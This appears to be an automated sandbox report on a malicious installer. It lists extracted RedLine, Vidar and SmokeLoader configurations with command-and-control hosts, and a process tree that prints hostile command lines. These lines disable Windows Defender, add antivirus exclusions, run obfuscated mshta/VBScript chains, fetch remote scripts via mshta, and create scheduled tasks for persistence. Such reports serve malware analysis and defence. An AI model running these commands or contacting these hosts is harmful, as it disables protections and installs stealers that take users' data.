Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
202s -
max time network
262s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
27-08-2021 16:23
General
-
Target
Setup (19).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
2608
C2
tambisup.com:9825
Extracted
Family
vidar
Version
40.1
Botnet
995
C2
https://eduarroma.tumblr.com/
Attributes
-
profile_id
995
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
40.1
Botnet
937
C2
https://eduarroma.tumblr.com/
Attributes
-
profile_id
937
Extracted
Family
redline
Botnet
supertraff
C2
135.148.139.222:1494
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 23 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Vidar Stealer 3 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Themida packer 9 IoCs
Detects Themida, an advanced Windows software protection system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\Pxg7Yw1H6Ie1DXoUh_DcgVyx.exe"C:\Users\Admin\Documents\Pxg7Yw1H6Ie1DXoUh_DcgVyx.exe"2⤵
-
-
C:\Users\Admin\Documents\nu1jOiLWabaXiTUVO3SQZUwH.exe"C:\Users\Admin\Documents\nu1jOiLWabaXiTUVO3SQZUwH.exe"2⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe"C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe"2⤵
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 244⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
C:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exeC:\Users\Admin\Documents\cMZJMeEx0JYrmauw6tdHd7Wr.exe3⤵
-
-
-
C:\Users\Admin\Documents\d3kvhwVhMIATLPaBAI4Bvv8Z.exe"C:\Users\Admin\Documents\d3kvhwVhMIATLPaBAI4Bvv8Z.exe"2⤵
-
-
C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe"C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe"2⤵
-
C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe"C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe"3⤵
-
-
C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe"C:\Users\Admin\Documents\jJU3n7U7IPidXXQZ8iElfa1L.exe"3⤵
-
-
-
C:\Users\Admin\Documents\Pt7r7A9bTD9nQr6Wm90Ib58X.exe"C:\Users\Admin\Documents\Pt7r7A9bTD9nQr6Wm90Ib58X.exe"2⤵
-
-
C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe"C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe"2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ( "C:\Users\Admin\Documents\wvhv3FdipsxgaYLvJIs5Tjcs.exe" ) do taskkill -F -im "%~NxQ"4⤵
-
C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExEBX0iUoFB.EXe -PyTJSIPDC12bsxp0f15⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )6⤵
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac6⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -im "wvhv3FdipsxgaYLvJIs5Tjcs.exe"5⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe"C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe"2⤵
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
C:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exeC:\Users\Admin\Documents\OpS_jnCI7LuzS8LvjGT5Jfq5.exe3⤵
-
-
-
C:\Users\Admin\Documents\yqmBhSxDOKmMnBUrBeCPCXfn.exe"C:\Users\Admin\Documents\yqmBhSxDOKmMnBUrBeCPCXfn.exe"2⤵
-
-
C:\Users\Admin\Documents\FmK70eFuh537bQSFAE0rVKQF.exe"C:\Users\Admin\Documents\FmK70eFuh537bQSFAE0rVKQF.exe"2⤵
-
-
C:\Users\Admin\Documents\taO8WBe3sGY8JwP0WwKRGdeg.exe"C:\Users\Admin\Documents\taO8WBe3sGY8JwP0WwKRGdeg.exe"2⤵
-
-
C:\Users\Admin\Documents\JnolPXtCnUrhFlaaB0P1UpqF.exe"C:\Users\Admin\Documents\JnolPXtCnUrhFlaaB0P1UpqF.exe"2⤵
-
C:\Users\Admin\Documents\JnolPXtCnUrhFlaaB0P1UpqF.exe"C:\Users\Admin\Documents\JnolPXtCnUrhFlaaB0P1UpqF.exe"3⤵
-
-
-
C:\Users\Admin\Documents\J_odoucR52JMIAtSDtthVs1e.exe"C:\Users\Admin\Documents\J_odoucR52JMIAtSDtthVs1e.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\9b645c01-3e6b-4f8b-8b6d-e1696f37dff7\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\9b645c01-3e6b-4f8b-8b6d-e1696f37dff7\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\9b645c01-3e6b-4f8b-8b6d-e1696f37dff7\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Users\Admin\AppData\Local\Temp\9b645c01-3e6b-4f8b-8b6d-e1696f37dff7\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\9b645c01-3e6b-4f8b-8b6d-e1696f37dff7\AdvancedRun.exe" /SpecialRun 4101d8 50404⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\J_odoucR52JMIAtSDtthVs1e.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\J_odoucR52JMIAtSDtthVs1e.exe" -Force3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe3⤵
-
-
-
C:\Users\Admin\Documents\xSbEWvMbZJGX8oX5aXjoprLd.exe"C:\Users\Admin\Documents\xSbEWvMbZJGX8oX5aXjoprLd.exe"2⤵
-
C:\Users\Admin\Documents\xSbEWvMbZJGX8oX5aXjoprLd.exe"C:\Users\Admin\Documents\xSbEWvMbZJGX8oX5aXjoprLd.exe"3⤵
-
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe"C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe"2⤵
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
C:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exeC:\Users\Admin\Documents\MHmINJe3zN1TWOl7Mci_NONP.exe3⤵
-
-
-
C:\Users\Admin\Documents\cvlqiE2nW8rTgPchAfoAuHyT.exe"C:\Users\Admin\Documents\cvlqiE2nW8rTgPchAfoAuHyT.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 2604⤵
- Program crash
-
-
-
-
C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe"C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe"2⤵
-
C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe"C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe"3⤵
-
-
C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe"C:\Users\Admin\Documents\TVc6vdbgL4iNAzg4BC3X6Olh.exe"3⤵
-
-
-
C:\Users\Admin\Documents\8F8Du9NYE5TM4uHthdJ0FPew.exe"C:\Users\Admin\Documents\8F8Du9NYE5TM4uHthdJ0FPew.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\c9uN8dCk.com"C:\Users\Admin\AppData\Local\Temp\c9uN8dCk.com"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6662.tmp\6663.tmp\6664.bat C:\Users\Admin\AppData\Local\Temp\c9uN8dCk.com"4⤵
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5WpoSxqo.com"C:\Users\Admin\AppData\Local\Temp\5WpoSxqo.com"3⤵
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\ZERFCR8P.com"C:\Users\Admin\AppData\Local\Temp\ZERFCR8P.com"3⤵
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt4⤵
-
-
-
-
C:\Users\Admin\Documents\xUAWVbgheQaQZPHzEhPxOLmQ.exe"C:\Users\Admin\Documents\xUAWVbgheQaQZPHzEhPxOLmQ.exe"2⤵
-
-
C:\Users\Admin\Documents\eijeTGN1d4o_F3BMLHZPuxB_.exe"C:\Users\Admin\Documents\eijeTGN1d4o_F3BMLHZPuxB_.exe"2⤵
-
-
C:\Users\Admin\Documents\M3qGifafPi2zaNtGH1z0TTij.exe"C:\Users\Admin\Documents\M3qGifafPi2zaNtGH1z0TTij.exe"2⤵
-
-
C:\Users\Admin\Documents\T719vnIUkaB8BReRjVe5c8tl.exe"C:\Users\Admin\Documents\T719vnIUkaB8BReRjVe5c8tl.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 4803⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\78lBwuodXHy6XUQrNjYlBKKr.exe"C:\Users\Admin\Documents\78lBwuodXHy6XUQrNjYlBKKr.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 6763⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 6803⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 7043⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 7323⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\RnZ_X9CKDccv2NRzWpbbCF2R.exe"C:\Users\Admin\Documents\RnZ_X9CKDccv2NRzWpbbCF2R.exe"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Documents\uPTd21XaOgJg2JoYoTzn7XgT.exe"C:\Users\Admin\Documents\uPTd21XaOgJg2JoYoTzn7XgT.exe"2⤵
-
-
C:\Users\Admin\Documents\LAqVhLBAiS6p6smCJJK0gDj3.exe"C:\Users\Admin\Documents\LAqVhLBAiS6p6smCJJK0gDj3.exe"2⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
-
-
C:\Program Files (x86)\Company\NewProduct\inst1.exe"C:\Program Files (x86)\Company\NewProduct\inst1.exe"3⤵
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
-
-
-
C:\Users\Admin\Documents\hJWoYz5JAYPS1cRdut4t6eDM.exe"C:\Users\Admin\Documents\hJWoYz5JAYPS1cRdut4t6eDM.exe"2⤵
-
-
C:\Users\Admin\Documents\FudZMjy3yMTpaBpf5_BHe8XX.exe"C:\Users\Admin\Documents\FudZMjy3yMTpaBpf5_BHe8XX.exe"2⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\FUDZMJ~1.DLL,s C:\Users\Admin\DOCUME~1\FUDZMJ~1.EXE3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ( "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.1MB
-
Filesize
35.8MB
-
Filesize
1.2MB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
32.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
584KB
-
Filesize
4KB
-
Filesize
1.4MB
-
Filesize
912KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
88KB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
5.0MB
-
Filesize
4KB
-
Filesize
88KB
-
Filesize
5.0MB
-
Filesize
6.0MB
-
Filesize
40.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
32.0MB
-
Filesize
628KB
-
Filesize
31.7MB
-
Filesize
36KB
-
Filesize
40KB
-
Filesize
31.7MB
-
Filesize
188KB
-
Filesize
5.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
8KB
-
Filesize
6.0MB
-
Filesize
6.0MB
-
Filesize
5.0MB
-
Filesize
128KB
-
Filesize
6.0MB
-
Filesize
36KB
-
Filesize
1.4MB
-
Filesize
12KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
6.0MB
-
Filesize
128KB
-
Filesize
6.0MB
-
Filesize
6.0MB
-
Filesize
6.0MB
-
Filesize
6.0MB
-
Filesize
5.0MB
-
Filesize
6.0MB
-
Filesize
6.0MB
-
Filesize
5.0MB
-
Filesize
5.0MB
-
Filesize
6.0MB
-
Filesize
6.0MB
-
Filesize
5.0MB
-
Filesize
4KB
